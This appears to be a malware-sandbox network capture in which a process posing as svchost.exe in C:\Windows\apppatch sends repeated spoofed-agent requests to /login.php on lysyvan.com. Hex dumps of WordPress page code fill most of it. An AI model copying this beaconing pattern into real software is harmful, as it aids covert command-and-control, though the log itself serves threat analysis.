                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70
                                                                                                                                                                                                            Data Ascii: rder-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .p
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61
                                                                                                                                                                                                            Data Ascii: grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.a
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d
                                                                                                                                                                                                            Data Ascii: [type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-m


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            5192.168.2.454057188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 07:00:20 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC902INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:21 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="48.1",amp_style_sanitizer;dur="23.8",amp_tag_and_attribute_sanitizer;dur="20.7",amp_optimizer;dur="8.0"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FUraIUkIVKiNmoYlZk76JgBK02AKSk%2B6%2Fwdt5%2Btu5QDCOlNazCg9Lm2ohHB1sxmCYlJyaJhYwqki9dwzps7A6HhXAfNwUNdbtoImT4%2Ff%2BNovyW4XQQGZ5tGYrdxGUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f9e9d880f98-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC467INData Raw: 37 63 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c2b<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 33 34 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65
                                                                                                                                                                                                            Data Ascii: 34000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-te
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f
                                                                                                                                                                                                            Data Ascii: phtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflo
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74
                                                                                                                                                                                                            Data Ascii: er-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplet
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61
                                                                                                                                                                                                            Data Ascii: ][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-a
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74
                                                                                                                                                                                                            Data Ascii: -layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68
                                                                                                                                                                                                            Data Ascii: layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][h
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                                                                                                                                                                                            Data Ascii: y{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69
                                                                                                                                                                                                            Data Ascii: ],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordi
                                                                                                                                                                                                            2024-09-08 07:00:22 UTC1369INData Raw: 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75
                                                                                                                                                                                                            Data Ascii: 0.mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="modu


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            6192.168.2.454059188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 07:00:23 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC898INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:24 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="42.8",amp_style_sanitizer;dur="21.1",amp_tag_and_attribute_sanitizer;dur="18.6",amp_optimizer;dur="5.9"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaujCRDVApxRtyGuqSoVE2Cno6mVxbWRnDQjHD6R8nsFDl9UMYPqIPMP7vbrYn%2BJCcl9DPbZpM1x4NaXTzG7gpK6Pmhi9UMUfa%2FfwBakrV%2FXXXteLlNgewzCPDlwhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0fac4fe80f83-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC471INData Raw: 37 63 32 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c2f<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65 78 74 2d 73
                                                                                                                                                                                                            Data Ascii: 0">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-text-s
                                                                                                                                                                                                            2024-09-08 07:00:25 UTC1369INData Raw: 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a
                                                                                                                                                                                                            Data Ascii: l-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflow-x:
